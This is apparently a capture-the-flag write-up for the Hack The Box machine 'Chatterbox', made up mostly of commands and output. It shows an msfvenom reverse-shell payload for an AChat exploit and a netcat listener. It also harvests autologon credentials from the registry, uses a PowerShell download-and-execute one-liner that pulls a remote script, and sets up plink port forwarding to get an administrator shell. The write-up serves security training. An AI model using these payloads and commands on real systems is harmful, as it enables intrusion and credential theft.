root@kali:~/htb# nmap -p- 10.10.10.74 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 08:24 EDT Stats: 0:12:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 33.42% done; ETC: 09:02 (0:25:10 remaining) Stats: 0:12:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 33.52% done; ETC: 09:02 (0:25:09 remaining) Nmap scan report for 10.10.10.74 Host is up (0.034s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 9255/tcp open mon 9256/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 1662.31 seconds
msfvenom
. Lucky for us the author of the exploit was nice enough to specify his exact command used in the comments, so we know the correct options along with which bad characters to exclude
root@kali:~/htb# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.5 lport=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' EXITFUNC=thread BufferRegister=EAX -f python Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/unicode_mixed x86/unicode_mixed succeeded with size 774 (iteration=0) x86/unicode_mixed chosen with final size 774 Payload size: 774 bytes Final size of python file: 3706 bytes buf = "" buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" --snip-- buf += "\x70\x47\x4a\x73\x51\x62\x42\x4f\x72\x4a\x39\x70\x42" buf += "\x33\x69\x6f\x59\x45\x41\x41" root@kali:~/htb#
We can go ahead and edit the exploit with our newly generated shellcode. Start up a netcat listener and run our exploit.
There seemed to be a file permissions misconfiguration on the local administrators
folder, and the root.txt
file. I assumed this was the method we were supposed to take to get the root.txt
flag. root.txt
is owned by Alfred
so we can use icacls
to give full permissions on the root.txt
file so we can read it.
root@kali:~/htb# python achat.py
---->{P00F}!
root@kali:~/htb# rlwrap nc -lvp 443 listening on [any] 443 ... 10.10.10.74: inverse host lookup failed: Unknown host connect to [10.10.14.2] from (UNKNOWN) [10.10.10.74] 49157 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami
whoami chatterbox\alfred
C:\Users\Administrator\Desktop>type root.txt
type root.txt Access is denied.
C:\Users\Administrator\Desktop>dir /Q
dir /Q
Volume in drive C has no label.
Volume Serial Number is 9034-6528
Directory of C:\Users\Administrator\Desktop
12/10/2017 07:50 PM <DIR> BUILTIN\Administrators .
12/10/2017 07:50 PM <DIR> NT AUTHORITY\SYSTEM ..
12/10/2017 07:50 PM 32 CHATTERBOX\Alfred root.txt
1 File(s) 32 bytes
2 Dir(s) 17,932,922,880 bytes free
C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
CHATTERBOX\Administrator:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CHATTERBOX\Alfred:(OI)(CI)(ID)F
C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r
cacls root.txt /g Alfred:r
y Are you sure (Y/N)?processed file: C:\Users\Administrator\Desktop\root.txt C:\Users\Administrator\Desktop>type root.txt
a67*****c7c
Privilege Escalation
After running through some basic privilege escalation enumeration (ahem) we find some credentials in the registry for autologon.
C:\Windows\Panther>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
DefaultDomainName REG_SZ
DefaultUserName REG_SZ Alfred
DefaultPassword REG_SZ Welcome1!
Attempting to re-use this password with the Administrator account is successful, and can be
achieved using powershell or by opening SMB and using impacket’s psexec. Using powershell, the command
$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential('administrator' $passwd)
will store the credentials in $creds for the session. A reverse shell can now be opened with the supplied credentials using the command
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.2/puckieshell53.ps1')" -Credential $creds
It’s possible that password reuse may be at play here for the Administrator. To exploit this we’ll need to open up SMB on our target. We can do this by uploading plink.exe
to our target and port forwarding over port 445.
First we start up our python http server.
root@kali:~/pwk# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.74 - - [20/Aug/2019 08:40:06] "GET /plink.exe HTTP/1.1" 200 -
Next we’ll download plink.exe
using a powershell one liner.
C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.2/plink.exe', 'plink.exe')"
Start SSH service on our attacking box.
root@kali:~/htb/chatterbox# service ssh start
And run plink.exe
from our target to forward the port over SSH.
C:\Users\Alfred>plink.exe -l puck -pw iestyle -R 445:127.0.0.1:445 10.10.14.5
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 fc:4d:bc:2f:51:41:40:0d:2e:e2:86:a6:06:fb:98:88
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 10 09:31:17 2017 from 10.10.10.43
root@kali:~#
We can verify the port forward is working with netstat
.
root@kali:~/htb/chatterbox# netstat -ano | grep 445
tcp 0 0 127.0.0.1:445 0.0.0.0:* LISTEN off (0.00/0/0)
tcp6 0 0 ::1:445 :::* LISTEN off (0.00/0/0)
Excellent. Now let’s use winexe
to get a shell.
root@kali:~/htb/chatterbox# winexe -U Administrator //127.0.0.1 "cmd.exe"
Enter password:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
chatterbox\administrator
C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5/puckieshell53.ps1', 'puckieshell53.ps1')" C:\Users\Alfred>powershell -ExecutionPolicy ByPass -File puckieshell53.ps1
Author :Puckiestyle